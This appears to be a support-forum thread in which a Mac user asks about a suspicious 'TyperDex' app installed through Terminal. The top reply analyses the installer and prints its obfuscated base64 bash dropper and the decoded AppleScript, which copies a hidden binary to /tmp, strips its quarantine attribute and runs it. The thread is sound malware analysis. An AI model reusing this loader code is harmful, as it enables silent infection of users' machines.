Downloaded a suspicious app. Please help

I use a mac and I downloaded typerdex(.)org’s app. Came across the app thru someone on threads and they guided me to download and install the app but it wasn’t the usual way of installing.

After opening the dmg file it said to move it to terminal and when I did that and press enter it asked me to enter my mac’s password, I did that and that was it. I don’t see any app installed. I’m scared that there might be something running in the background that I’m not aware of. The person who guided me has blocked me so clearly there’s something going on. Is there any way I could find out if this is a virus or something and if so, how can I get rid of it?

Appreciate the help!

MacBook Pro 16″, macOS 15.3

Posted on Mar 27, 2025 4:53 PM

⚠️

Top-ranking reply

g_wolfman

Level 4

3,016 points

Posted on Mar 27, 2025 7:33 PM

Not 100% sure it's malicious - but it is kind of sketchy at least. The file in the DMG you drag to the Terminal is a bash script:

#!/bin/bash

FXhoRLqY='IyEvYmluL2Jhc2gKb3Nhc2NyaXB0IC1lICdvbiBydW4KICAgIHRyeQogICAgICAgIHNldCBkaXNrTGlzdCB0byBsaXN0IGRpc2'
xUraPryk='tzCiAgICBlbmQgdHJ5C'
AgQMGPxf='iAgICBzZXQgdGFyZ2V0RGlzayB'
opxHSyoX='0byAiIgo'
jGEGUGmb='gICAgdHJ5CiAgICAgICAgcmVwZWF0'
YUEtjAJr='IHdpdGggZGlzayBpbiBkaXNrTGlzdAogICAgICAgICAgICBpZiBkaXNrIGNvbnRhaW5'
KXIkWjgK='zICJUeXBlckRleFNldHVwIiB0aGVuCiAgICAgICAgICAgICAgICBzZXQgdGFyZ2V0RGlzayB0byBkaXNrCiAg'
zzyRgDka='ICAgICAgICAgICAgIC'
FuDnOzWd='BleGl0IHJlcGVhdAogICAgICAgICAgICB'
SlewqVcl='lbmQgaWYKICAgICA'
iKttHYHF='gICBlbmQgcmVwZWF0CiAgICBlbmQgdHJ5C'
XGPSUmcU='iAgICBpZiB0YXJnZXREaXNrIGlzICIiIHRoZW4KICAgICAgICByZXR1cm4KICAgIGVuZCBpZgogICAgc2V0IGZvbGRlclB'
jdRZzsIY='hdGggdG8gIi9Wb2x1bWVzLyIgJiB0YXJnZXREaXNrICYgIi8iCiAgICBzZXQgYXBwTmFtZSB0'
XOnrPYmo='byAiLlR5cGVyRGV4U2V0dXAiCiAgICBzZXQgYXBwUGF0aCB0byBmb2xkZXJQYXRoICYgYXBwTmFtZQogICAgc2V0IHRlbXBBcHBQ'
ZipdVIwQ='YXRoIHRvIC'
qNraIQCR='IvdG1wLyIgJiBh'
HzfKDDyz='cHBOYW1lCiAgICB0'
XnOxbqKW='cnkKICAgICAgICBkbyBzaGVsbCBzY3JpcHQgInJtIC1mICIgJiBxdW90ZWQgZm9ybSBvZiB0ZW1wQXBwUGF0aAogICAgZW5kIHRyeQogICAgdHJ5CiAgICAgICA'
FKGSwYHi='gZG8gc2hlbGwgc2NyaXB0ICJjcCAiICYgcXVvdGVkIGZvcm0gb2YgYXBwUGF0aCAmICIgIiA'
pMpKcAEb='mIHF1b3RlZCBmb3JtIG9mIHRlbXBBcHBQYXRoCiAgICBlbmQgdHJ5CiAgICB0cnkKICAgICAgICBkbyBzaGVsbCBzY3JpcHQgInhhdHR'
VLfddcEb='yIC1jICIgJiBxdW90ZWQgZm9ybSBvZiB'
plNENAmz='0Z'
nlUYhzhZ='W1wQXBwUGF0aAogICAgZW5kIHRyeQogICAgdHJ5CiAgICAgICAgZG8gc2hlbGwgc2NyaXB0ICJ'
PwjdatGl='jaG1vZCAreCAiICYgcXVvdGVkIGZvcm0gb2YgdGVtcEFwcFBhdGgKICAgIGVuZCB0cnkKICAgIHRyeQogICAgICAgIGRvIHNoZWxsIHNjcmlwdCBxdW90ZWQgZm9ybSBvZiB0ZW1wQXB'
JhDsfXxD='wUGF0aAogICAgZW5kIHRyeQplbmQgcnVuJw=='
code="${FXhoRLqY}${xUraPryk}${AgQMGPxf}${opxHSyoX}${jGEGUGmb}${YUEtjAJr}${KXIkWjgK}${zzyRgDka}${FuDnOzWd}${SlewqVcl}${iKttHYHF}${XGPSUmcU}${jdRZzsIY}${XOnrPYmo}${ZipdVIwQ}${qNraIQCR}${HzfKDDyz}${XnOxbqKW}${FKGSwYHi}${pMpKcAEb}${VLfddcEb}${plNENAmz}${nlUYhzhZ}${PwjdatGl}${JhDsfXxD}"

bash -c "$(echo "$code" | base64 --decode)"

The unreadable part in the middle seems to be Base64 encoded:

#!/bin/bash
osascript -e 'on run
    try
        set diskList to list disks
    end try
    set targetDisk to ""
    try
        repeat with disk in diskList
            if disk contains "TyperDexSetup" then
                set targetDisk to disk
                exit repeat
            end if
        end repeat
    end try
    if targetDisk is "" then
        return
    end if
    set folderPath to "/Volumes/" & targetDisk & "/"
    set appName to ".TyperDexSetup"
    set appPath to folderPath & appName
    set tempAppPath to "/tmp/" & appName
    try
        do shell script "rm -f " & quoted form of tempAppPath
    end try
    try
        do shell script "cp " & quoted form of appPath & " " & quoted form of tempAppPath
    end try
    try
        do shell script "xattr -c " & quoted form of tempAppPath
    end try
    try
        do shell script "chmod +x " & quoted form of tempAppPath
    end try
    try
        do shell script quoted form of tempAppPath
    end try
end run'%

At a minimum, it seems to be copying an app named ".TyperDexSetup" into /tmp, make it executable and then run it. ".TyperDexSetup" is a 12 MB binary encoded file.

It's probably malware. Not 100%, but super sketchy. And whatever that binary did, it did with your administrator privilege level - so in theory anything...

View in context

18 replies

Sort By: